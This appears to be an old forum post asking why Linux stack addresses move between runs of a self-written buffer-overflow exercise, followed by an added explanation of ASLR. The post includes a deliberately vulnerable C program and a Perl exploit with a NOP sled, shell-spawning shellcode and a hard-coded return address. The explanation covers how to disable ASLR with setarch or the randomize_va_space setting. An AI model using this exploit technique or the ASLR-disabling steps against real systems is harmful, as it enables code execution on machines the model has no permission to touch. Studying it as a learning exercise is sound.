"Moving" Stack: my poor return address!
Hello,
To see if I still knew how to code simple buffer overflows after a long
absence from it, I threw together a quick vulnerable C program today and
wrote an exploit for it. The whole process went great, until I went to
find the return address I wanted in the stack. I have a 4096 byte
buffer, and since I had the room I put in 2048 NOPs at the beginning of
the buffer. However, when I run the exploit then open the core in gdb,
the stack is always in a different place. And we're not talking about a
different place by a few thousand bytes, either. One time I'll run it
and the NOPs will be at 0xbfe4dab0, the next time they will be at
0xbf9af420. That's a HUGE distance away!
I'm running on Fedora 5. Is this a security thing that's new in the past
2 years or so since I've coded one of these? Is there any way I can
either (1) make the stack sit still so I can point into it or (2) find
out where it is during execution?
------- lame.c ------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy() */

int main(int argc, char *argv[]) {
    char buffer[4096]; /* we're gonna overflow this jawn */
    if (argc != 2) {
        printf("Usage: %s <string to copy>\n", argv[0]);
        return 1;
    }
    strcpy(buffer, argv[1]); /* tisk tisk tisk: no length check, argv[1] can be longer than 4096 */
    printf("Buffer now holds: %s\n", buffer);
    return 0;
}
-----end lame.c -----
------exp.pl -----
#!/usr/bin/perl
use strict;
use warnings;

my $prog = "/home/jack/break/lame";
my $buffer;

# shellcode - /bin/sh -c "echo [ElectronicSouls]; uname -a; id" (89 bytes)
my $c0de = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
           "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
           "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
           "\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65".
           "\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73".
           "\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b".
           "\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69".
           "\x6e\x2f\x73\x68\x01";

$buffer  = "\x90" x (2048 + (1024 - length($c0de))); # NOP sled
$buffer .= $c0de;                                     # shellcode
$buffer .= "\xc0\x15\x9d\xbf" x (1024 / 4);           # return addr: 0xbf9d15c0 WAS in the middle...

# other addresses the NOPs were... look how far apart these are!
#0xbfe4dab0-0xbfe4e640
#0xbf9af420-0xbf9affa0

exec $prog, $buffer;
-----end exp.pl------
Thanks for looking, hope someone can lend a hand...
-Jack Carrozzo
jack _{@}_ crepinc.com
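The behaviour described in the post is stack address randomization (ASLR), which Fedora shipped enabled around that time. The C program below is an added example written for this page, not part of the original post or its exploit. It answers the two questions in the post in a way you can run: it reads the kernel's ASLR setting from /proc/sys/kernel/randomize_va_space, shows where a freshly exec'd process's stack actually landed by parsing the [stack] line of that process's /proc/<pid>/maps, and shows that asking for personality(ADDR_NO_RANDOMIZE) before the exec pins the stack in place. It assumes Linux with /proc mounted and /bin/cat available; the maps sample used for the parser is constructed, with the post's 0xbfe4d... stack value plugged in, and the function names are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/personality.h>

/* Kernel ASLR setting: 0 = off, 1 = stack/mmap randomized, 2 = brk too.
 * Returns -1 if the file cannot be read (no /proc, or a pre-2.6.12 kernel). */
int read_randomize_va_space(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (!f) return -1;
    if (fscanf(f, "%d", &v) != 1) v = -1;
    fclose(f);
    return v;
}

/* Find the "[stack]" mapping in /proc/<pid>/maps-format text
 * ("lo-hi perms offset dev inode path") and return 1 with its bounds,
 * or 0 when no such line exists. */
int parse_stack_range(const char *maps, unsigned long *lo, unsigned long *hi)
{
    const char *line = maps;
    while (line && *line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        const char *tag = strstr(line, "[stack]");
        /* Only accept the tag if it falls inside the current line. */
        if (tag && (size_t)(tag - line) < len)
            return sscanf(line, "%lx-%lx", lo, hi) == 2;
        line = nl ? nl + 1 : NULL;
    }
    return 0;
}

/* Run a fresh process (exec re-randomizes the layout; fork alone does not),
 * have it dump its own maps, and return the low address of its stack.
 * disable_aslr=1 requests ADDR_NO_RANDOMIZE first; sandboxes (seccomp) may
 * refuse that, in which case the stack keeps moving. Returns 0 on error. */
unsigned long stack_base_of_fresh_process(int disable_aslr)
{
    int fd[2];
    if (pipe(fd) != 0) return 0;
    pid_t pid = fork();
    if (pid < 0) return 0;
    if (pid == 0) {
        close(fd[0]);
        dup2(fd[1], STDOUT_FILENO);
        close(fd[1]);
        if (disable_aslr)
            personality(ADDR_NO_RANDOMIZE);
        execl("/bin/cat", "cat", "/proc/self/maps", (char *)NULL);
        _exit(127);
    }
    close(fd[1]);
    static char buf[65536];
    size_t n = 0;
    ssize_t r;
    while ((r = read(fd[0], buf + n, sizeof buf - 1 - n)) > 0) {
        n += (size_t)r;
        if (n >= sizeof buf - 1) break;
    }
    buf[n] = '\0';
    close(fd[0]);
    waitpid(pid, NULL, 0);
    unsigned long lo = 0, hi = 0;
    return parse_stack_range(buf, &lo, &hi) ? lo : 0;
}

/* Number of distinct stack bases seen over `runs` fresh execs (max 64).
 * With ASLR on this is normally `runs`; with it off (or pinned) it is 1. */
int distinct_stack_bases(int runs, int disable_aslr)
{
    unsigned long seen[64];
    int count = 0;
    if (runs > 64) runs = 64;
    for (int i = 0; i < runs; i++) {
        unsigned long b = stack_base_of_fresh_process(disable_aslr);
        int dup = 0;
        for (int j = 0; j < count; j++)
            if (seen[j] == b) dup = 1;
        if (!dup) seen[count++] = b;
    }
    return count;
}

int main(void)
{
    printf("kernel.randomize_va_space = %d\n", read_randomize_va_space());
    printf("distinct stack bases over 5 execs, as configured: %d\n",
           distinct_stack_bases(5, 0));
    printf("distinct stack bases over 5 execs, ADDR_NO_RANDOMIZE: %d\n",
           distinct_stack_bases(5, 1));
    return 0;
}
```

For option (1) in the post, the same personality flag is what `setarch i386 -R ./lame 'payload'` applies before exec, and as root `echo 0 > /proc/sys/kernel/randomize_va_space` turns randomization off system-wide; for option (2), the [stack] line of the target's /proc/<pid>/maps tells you where the stack landed for that particular run, which is exactly why a hard-coded 0xbf9d15c0 only works on the run it was taken from. Two stack bases roughly 4.6 MB apart, as in the post, are consistent with stack randomization, not a bug in the exploit.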